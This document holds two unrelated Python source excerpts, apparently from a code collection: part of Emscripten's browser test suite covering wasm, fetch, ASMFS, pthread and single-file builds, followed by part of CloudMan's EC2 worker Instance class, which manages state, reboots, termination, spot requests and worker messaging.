(['-s', 'BINARYEN_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'BINARYEN_ASYNC_COMPILATION=0'], 0), # force it off
(['-s', 'BINARYEN_ASYNC_COMPILATION=1', '-s', 'BINARYEN_METHOD="native-wasm,asmjs"'], 0), # try to force it on, but have it disabled
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), os.path.join(self.get_dir(), 'manual_wasm_instantiate.html'))
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define a "Module.locateFile(foo)" function to specify where the .wasm file (test.wasm) will be loaded from.
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open('shell2.html', 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
subprocess.check_call([PYTHON, EMCC, 'src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args+['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests the feature that the shell HTML page can preallocate the typed array and place it in Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/cached_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0'])
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
def test_fetch_stream_file(self):
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
f = open('largefile.txt', 'w')
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
for i in range(1024):
f.write(s)
f.close()
self.btest('fetch/stream_file.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'TOTAL_MEMORY=536870912'])
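# File-size arithmetic above: s starts at 8 bytes and is doubled 14 times, giving
# 8 * 2**14 = 128 KiB per write; written 1024 times, largefile.txt ends up 128 MiB.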
# Tests emscripten_fetch() usage in synchronous mode when used from the main thread proxied to a Worker with the -s PROXY_TO_PTHREAD=1 option.
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '--proxy-to-worker'])
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'hello_file.txt'))
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl-open/src.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in single-threaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Tests the absolute minimum pthread-enabled application.
def test_hello_thread(self):
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = os.path.join(self.get_dir(), 'src.c')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
Popen([PYTHON, EMCC, 'src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0']).communicate()
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), os.path.join(self.get_dir(), 'hello_thread_with_blob_url.html'))
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='interpret-binary'"]
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
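# The page above deliberately stubs out atob (and fetch) before loading a.out.js,
# so the SINGLE_FILE build (whose binary payload is embedded as base64) has to
# fall back to the JS-side base64 decoder rather than the browser's native atob.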
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"], also_proxied=True)
assert os.path.exists('test.html') and not os.path.exists('test.js') and not os.path.exists('test.worker.js')
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = [PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
run_process(args)
open('test.html', 'w').write('''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"]).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
assert os.path.exists('test.js') and not os.path.exists('test.worker.js')
def test_access_file_after_heap_resize(self):
open('test.txt', 'w').write('hello from file')
open('page.c', 'w').write(self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
Popen([PYTHON, EMCC, 'page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
open(self.in_dir('main.cpp'), 'w').write(self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
subprocess.check_output([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
|
instance.py
|
"""CloudMan worker instance class"""
import datetime as dt
import json
import logging
import logging.config
import threading
import time
from boto.exception import EC2ResponseError
from cm.services import ServiceRole
from cm.services import ServiceType
from cm.util import instance_lifecycle, instance_states, misc, spot_states, Time
from cm.util.decorators import TestFlag
log = logging.getLogger('cloudman')
# A time well in the past, used to seed the reboot and last-comm timestamps.
TIME_IN_PAST = dt.datetime(2012, 1, 1, 0, 0, 0)
class Instance(object):
def __init__(self, app, inst=None, m_state=None, last_m_state_change=None,
reboot_required=False, spot_request_id=None):
self.app = app
self.config = app.config
self.spot_request_id = spot_request_id
self.lifecycle = instance_lifecycle.SPOT if self.spot_request_id else instance_lifecycle.ONDEMAND
self.inst = inst # boto object of the instance
self.spot_state = None
self.private_ip = None
self.public_ip = None
self.local_hostname = None
if inst:
try:
self.id = str(inst.id)
except EC2ResponseError as e:
log.error("Error retrieving instance id: %s" % e)
else:
self.id = None
# Machine state as obtained from the cloud middleware (see
# instance_states Bunch)
self.m_state = m_state
self.last_m_state_change = Time.now()
# A time stamp when the most recent update of the instance state
# (m_state) took place
self.last_state_update = Time.now()
self.is_alive = False
self.num_cpus = 1
self.total_memory = 1 # in bytes
self.time_rebooted = TIME_IN_PAST # Initialize to a date in the past
self.reboot_count = 0
self.terminate_attempt_count = 0
self.last_comm = TIME_IN_PAST # Initialize to a date in the past
self.nfs_data = 0
self.nfs_tools = 0
self.nfs_indices = 0
self.nfs_sge = 0
self.nfs_tfs = 0 # Transient file system, NFS-mounted from the master
self.get_cert = 0
self.sge_started = 0
self.slurmd_running = 0
# NodeName by which this instance is tracked in Slurm
self.alias = 'w{0}'.format(self.app.number_generator.next())
self.worker_status = 'Pending' # Pending, Wake, Startup, Ready, Stopping, Error
self.load = 0
self.type = 'Unknown'
self.reboot_required = reboot_required
self.update_spot()
def __repr__(self):
return self.get_desc()
def maintain(self):
""" Based on the state and status of this instance, try to do the right thing
to keep the instance functional. Note that this may lead to terminating
the instance.
"""
def reboot_terminate_logic():
""" Make a decision whether to terminate or reboot an instance.
CALL THIS METHOD CAREFULLY because it defaults to terminating the
instance!
"""
if self.reboot_count < self.config.instance_reboot_attempts:
self.reboot()
elif self.terminate_attempt_count >= self.config.instance_terminate_attempts:
log.info("Tried terminating instance {0} {1} times but was unsuccessful. Giving up."
.format(self.inst.id, self.config.instance_terminate_attempts))
self._remove_instance()
else:
log.info("Instance {0} not responding after {1} reboots. Terminating instance."
.format(self.id, self.reboot_count))
self.terminate()
# Update state then do resolution
state = self.get_m_state()
if state == instance_states.PENDING or state == instance_states.SHUTTING_DOWN:
if (Time.now() - self.last_m_state_change).seconds > self.config.instance_state_change_wait and \
(Time.now() - self.time_rebooted).seconds > self.config.instance_reboot_timeout:
log.debug("'Maintaining' instance {0} stuck in '{1}' state.".format(
self.get_desc(), state))
reboot_terminate_logic()
elif state == instance_states.ERROR:
log.debug("'Maintaining' instance {0} in '{1}' state.".format(self.get_desc(), instance_states.ERROR))
reboot_terminate_logic()
elif state == instance_states.TERMINATED:
log.debug("'Maintaining' instance {0} in '{1}' state.".format(self.get_desc(), instance_states.TERMINATED))
self._remove_instance()
elif state == instance_states.RUNNING:
log.debug("'Maintaining' instance {0} in '{1}' state (last comm before {2} | "
"last m_state change before {3} | time_rebooted before {4}"
.format(self.get_desc(), instance_states.RUNNING,
dt.timedelta(seconds=(Time.now() - self.last_comm).seconds),
dt.timedelta(seconds=(Time.now() - self.last_m_state_change).seconds),
dt.timedelta(seconds=(Time.now() - self.time_rebooted).seconds)))
if (Time.now() - self.last_comm).seconds > self.config.instance_comm_timeout and \
(Time.now() - self.last_m_state_change).seconds > self.config.instance_state_change_wait and \
(Time.now() - self.time_rebooted).seconds > self.config.instance_reboot_timeout:
reboot_terminate_logic()
@TestFlag(None)
def get_cloud_instance_object(self, deep=False):
""" Get the instance object for this instance from the library used to
communicate with the cloud middleware. In the case of boto, this
is the boto EC2 Instance object.
:type deep: bool
:param deep: If True, force the check with the cloud middleware; else
use local field by default
:rtype: boto.ec2.instance.Instance (should really be a more generic repr
but we'll wait for OCCI or something)
:return: cloud instance object for this instance
"""
if deep is True: # reset the current local instance field
self.inst = None
if self.inst is None and self.id is not None:
try:
rs = self.app.cloud_interface.get_all_instances(self.id)
if len(rs) == 0:
log.warning("Instance {0} not found on the cloud?".format(
self.id))
for r in rs:
# Update local fields
self.inst = r.instances[0]
self.id = r.instances[0].id
self.m_state = r.instances[0].state
except EC2ResponseError, e:
log.error("Trouble getting the cloud instance ({0}) object: {1}".format(self.id, e))
except Exception, e:
log.error("Error getting the cloud instance ({0}) object: {1}".format(self.id, e))
elif not self.is_spot():
log.debug(
"Cannot get cloud instance object without an instance ID?")
return self.inst
def is_spot(self):
""" Test is this Instance is a Spot instance.
:rtype: bool
:return: True if the current Instance is Spot instance, False otherwise.
"""
return self.lifecycle == instance_lifecycle.SPOT
def spot_was_filled(self):
""" For Spot-based instances, test if the spot request has been
filled (ie, an instance was started)
:rtype: bool
:return: True if this is a Spot instance and the Spot request
is in state spot_states.ACTIVE. False otherwise.
"""
self.update_spot()
if self.is_spot() and self.spot_state == spot_states.ACTIVE:
return True
return False
def get_status_dict(self):
toret = {'id': self.id,
'alias': self.alias,
'ld': self.load,
'time_in_state': misc.formatSeconds(Time.now() - self.last_m_state_change),
'nfs_data': self.nfs_data,
'nfs_tools': self.nfs_tools,
'nfs_indices': self.nfs_indices,
'nfs_sge': self.nfs_sge,
'nfs_tfs': self.nfs_tfs,
'get_cert': self.get_cert,
'slurmd_running': self.slurmd_running,
'worker_status': self.worker_status,
'instance_state': self.m_state,
'instance_type': self.type,
'public_ip': self.public_ip}
if self.load:
lds = self.load.split(' ')
if len(lds) == 3:
toret['ld'] = "%s %s %s" % (float(lds[0]) / self.num_cpus, float(
lds[1]) / self.num_cpus, float(lds[2]) / self.num_cpus)
return toret
def get_status_array(self):
        if self.m_state.lower() == "running": # For extra states.
            ld = self.m_state  # Default so 'ld' is always defined below
            if self.is_alive is not True:
ld = "Starting"
elif self.load:
lds = self.load.split(' ')
if len(lds) == 3:
try:
load1 = float(lds[0]) / self.num_cpus
load2 = float(lds[1]) / self.num_cpus
load3 = float(lds[2]) / self.num_cpus
ld = "%s %s %s" % (load1, load2, load3)
except Exception, e:
log.debug("Problems normalizing load: %s" % e)
ld = self.load
else:
ld = self.load
elif self.worker_status == "Ready":
ld = "Running"
return [self.id, ld, misc.formatSeconds(
Time.now() - self.last_m_state_change),
self.nfs_data, self.nfs_tools, self.nfs_indices, self.nfs_sge, self.get_cert,
self.sge_started, self.worker_status]
else:
return [self.id, self.m_state,
misc.formatSeconds(Time.now() - self.last_m_state_change),
self.nfs_data, self.nfs_tools, self.nfs_indices,
self.nfs_sge, self.get_cert, self.sge_started,
self.worker_status]
@TestFlag("TestInstanceID")
def get_id(self):
if self.inst is not None and self.id is None:
try:
self.inst.update()
self.id = self.inst.id
except EC2ResponseError, e:
log.error("Error retrieving instance id: %s" % e)
except Exception, e:
log.error("Exception retreiving instance object: %s" % e)
return self.id
def get_desc(self):
""" Get basic but descriptive info about this instance. Useful for logging.
"""
if self.is_spot() and not self.spot_was_filled():
return "'{sid}'".format(sid=self.spot_request_id)
# TODO : DO NOT redefine id, etc.
return "'{id}; {ip}; {sn}'".format(id=self.get_id(), ip=self.get_public_ip(),
sn=self.alias)
def reboot(self, count_reboot=True):
"""
Reboot this instance. If ``count_reboot`` is set, increment the number
        of reboots for this instance (a threshold in this count leads to eventual
instance termination, see ``self.config.instance_reboot_attempts``).
"""
if self.inst is not None:
# Show reboot count only if this reboot counts toward the reboot quota
s = " (reboot #{0})".format(self.reboot_count + 1)
log.info("Rebooting instance {0}{1}.".format(self.get_desc(),
s if count_reboot else ''))
try:
self.inst.reboot()
self.time_rebooted = Time.now()
except EC2ResponseError, e:
log.error("Trouble rebooting instance {0}: {1}".format(self.get_desc(), e))
else:
log.debug("Attampted to reboot instance {0} but no instance object? "
"(doing nothing)".format(self.get_desc()))
if count_reboot:
            # Increment irrespective of success to allow for eventual termination
self.reboot_count += 1
log.debug("Incremented instance reboot count to {0} (out of {1})"
.format(self.reboot_count, self.config.instance_reboot_attempts))
def terminate(self):
self.worker_status = "Stopping"
t_thread = threading.Thread(target=self.__terminate)
t_thread.start()
return t_thread
def __terminate(self):
inst_terminated = self.app.cloud_interface.terminate_instance(
instance_id=self.id,
spot_request_id=self.spot_request_id if self.is_spot() else None)
self.terminate_attempt_count += 1
if inst_terminated is False:
log.error("Terminating instance %s did not go smoothly; instance state: '%s'"
% (self.get_desc(), self.get_m_state()))
else:
# Remove the reference to the instance object because with OpenStack &
# boto the instance.update() method returns the instance as being
# in 'running' state even though the instance does not even exist
# any more.
self.inst = None
self._remove_instance()
def _remove_instance(self, force=False):
""" A convenience method to remove the current instance from the list
of worker instances tracked by the master object.
:type force: bool
        :param force: Indicate if the instance should be forcefully (ie, irrespective
                      of other logic) removed from the list of instances maintained
by the master object.
"""
try:
if self in self.app.manager.worker_instances:
self.app.manager.worker_instances.remove(self)
log.info(
"Instance '%s' removed from the internal instance list." % self.id)
# If this was the last worker removed, add master back as execution host.
if len(self.app.manager.worker_instances) == 0 and not self.app.manager.master_exec_host:
self.app.manager.toggle_master_as_exec_host()
except ValueError, e:
log.warning("Instance '%s' no longer in instance list, the global monitor probably "
"picked it up and deleted it already: %s" % (self.id, e))
@TestFlag("running")
def get_m_state(self):
""" Update the machine state of the current instance by querying the
cloud middleware for the instance object itself (via the instance
id) and updating self.m_state field to match the state returned by
the cloud middleware.
Also, update local last_state_update timestamp.
:rtype: String
:return: the current state of the instance as obtained from the
cloud middleware
"""
self.last_state_update = Time.now()
self.get_cloud_instance_object(deep=True)
if self.inst:
try:
state = self.inst.state
log.debug("Requested instance {0} update: old state: {1}; new state: {2}"
.format(self.get_desc(), self.m_state, state))
if state != self.m_state:
self.m_state = state
self.last_m_state_change = Time.now()
except EC2ResponseError, e:
log.debug("Error updating instance {0} state: {1}".format(
self.get_id(), e))
self.m_state = instance_states.ERROR
else:
if not self.is_spot() or self.spot_was_filled():
log.debug("Instance object {0} not found during m_state update; "
"setting instance state to {1}".format(self.get_id(), instance_states.TERMINATED))
self.m_state = instance_states.TERMINATED
return self.m_state
@TestFlag(None)
def send_alive_request(self):
self.app.manager.console_monitor.conn.send('ALIVE_REQUEST', self.id)
def send_sync_etc_host(self, msg):
# Because the hosts file is synced over the transientFS, give the FS
# some time to become available before sending the msg
for i in range(3):
if int(self.nfs_tfs):
self.app.manager.console_monitor.conn.send('SYNC_ETC_HOSTS | ' + msg, self.id)
break
log.debug("Transient FS on instance {0} not available (code {1}); "
"waiting a bit...".format(self.get_desc(), self.nfs_tfs))
time.sleep(7)
def update_spot(self, force=False):
""" Get an update on the state of a Spot request. If the request has entered
            spot_states.ACTIVE or spot_states.CANCELLED states, update the Instance
            object itself; otherwise, just update the state. The method will continue to poll
for an update until the spot request has been filled (ie, enters state
spot_states.ACTIVE). After that, simply return the spot state (see
force parameter).
:type force: bool
:param force: If True, poll for an update on the spot request,
irrespective of the stored spot request state.
"""
if self.is_spot() and (force or self.spot_state != spot_states.ACTIVE):
old_state = self.spot_state
try:
ec2_conn = self.app.cloud_interface.get_ec2_connection()
reqs = ec2_conn.get_all_spot_instance_requests(
request_ids=[self.spot_request_id])
for req in reqs:
self.spot_state = req.state
                    # Also update the worker_status because otherwise there is no
                    # way to distinguish between an instance that is simply Pending
                    # and a Spot request that has not been filled yet
self.worker_status = self.spot_state
# If the state has changed, do a deeper update
if self.spot_state != old_state:
if self.spot_state == spot_states.CANCELLED:
# The request was canceled so remove this Instance
# object
log.info("Spot request {0} was canceled; removing Instance object {1}"
.format(self.spot_request_id, self.id))
self._remove_instance()
elif self.spot_state == spot_states.ACTIVE:
# We should have an instance now
self.id = req.instance_id
log.info("Spot request {0} filled with instance {1}"
.format(self.spot_request_id, self.id))
# Potentially give it a few seconds so everything gets registered
for i in range(3):
instance = self.get_cloud_instance_object()
if instance:
self.app.cloud_interface.add_tag(instance, 'clusterName', self.app.ud['cluster_name'])
self.app.cloud_interface.add_tag(instance, 'role', 'worker')
self.app.cloud_interface.add_tag(instance, 'Name', "Worker: {0}".format(self.app.ud['cluster_name']))
break
time.sleep(5)
except EC2ResponseError, e:
log.error("Trouble retrieving spot request {0}: {1}".format(
self.spot_request_id, e))
return self.spot_state
@TestFlag("127.0.0.1")
def get_private_ip(self):
# log.debug("Getting instance '%s' private IP: '%s'" % ( self.id, self.private_ip ) )
if self.private_ip is None:
inst = self.get_cloud_instance_object()
if inst is not None:
try:
inst.update()
self.private_ip = inst.private_ip_address
except EC2ResponseError:
log.debug("private_ip_address for instance {0} not (yet?) available."
.format(self.get_id()))
else:
log.debug("private_ip_address for instance {0} with no instance object not available."
.format(self.get_id()))
return self.private_ip
@TestFlag('127.0.0.1')
def get_public_ip(self):
"""
Get the public IP address of this worker instance.
"""
if not self.public_ip:
inst = self.get_cloud_instance_object(deep=True)
# log.debug('Getting public IP for instance {0}'.format(inst.id))
if inst:
try:
inst.update()
self.public_ip = inst.ip_address
if self.public_ip:
log.debug("Got public IP for instance {0}: {1}".format(
self.get_id(), self.public_ip))
else:
log.debug("Still no public IP for instance {0}".format(
self.get_id()))
except EC2ResponseError:
log.debug("ip_address for instance {0} not (yet?) available.".format(
self.get_id()))
else:
log.debug("ip_address for instance {0} with no instance object not available."
.format(self.get_id()))
return self.public_ip
def get_local_hostname(self):
return self.local_hostname
def send_mount_points(self):
mount_points = []
for fs in self.app.manager.get_services(svc_type=ServiceType.FILE_SYSTEM):
if fs.nfs_fs:
fs_type = "nfs"
server = fs.nfs_fs.device
options = fs.nfs_fs.mount_options
elif fs.gluster_fs:
fs_type = "glusterfs"
server = fs.gluster_fs.device
options = fs.gluster_fs.mount_options
else:
fs_type = "nfs"
server = self.app.cloud_interface.get_private_ip()
options = None
mount_points.append(
{'fs_type': fs_type,
'server': server,
'mount_options': options,
'shared_mount_path': fs.get_details()['mount_point'],
'fs_name': fs.get_details()['name']})
jmp = json.dumps({'mount_points': mount_points})
self.app.manager.console_monitor.conn.send('MOUNT | %s' % jmp, self.id)
# log.debug("Sent mount points %s to worker %s" % (mount_points, self.id))
def send_master_pubkey(self):
# log.info("\tMT: Sending MASTER_PUBKEY message: %s" % self.app.manager.get_root_public_key() )
self.app.manager.console_monitor.conn.send('MASTER_PUBKEY | %s' % self.app.manager.get_root_public_key(), self.id)
log.debug("Sent master public key to worker instance '%s'." % self.id)
log.debug("\tMT: Message MASTER_PUBKEY %s sent to '%s'" % (self.app.manager.get_root_public_key(), self.id))
def send_start_slurmd(self):
log.debug("\tMT: Sending START_SLURMD message to instance {0}, named {1}"
.format(self.get_desc(), self.alias))
self.app.manager.console_monitor.conn.send('START_SLURMD | {0}'.format(
self.alias), self.id)
def send_start_sge(self):
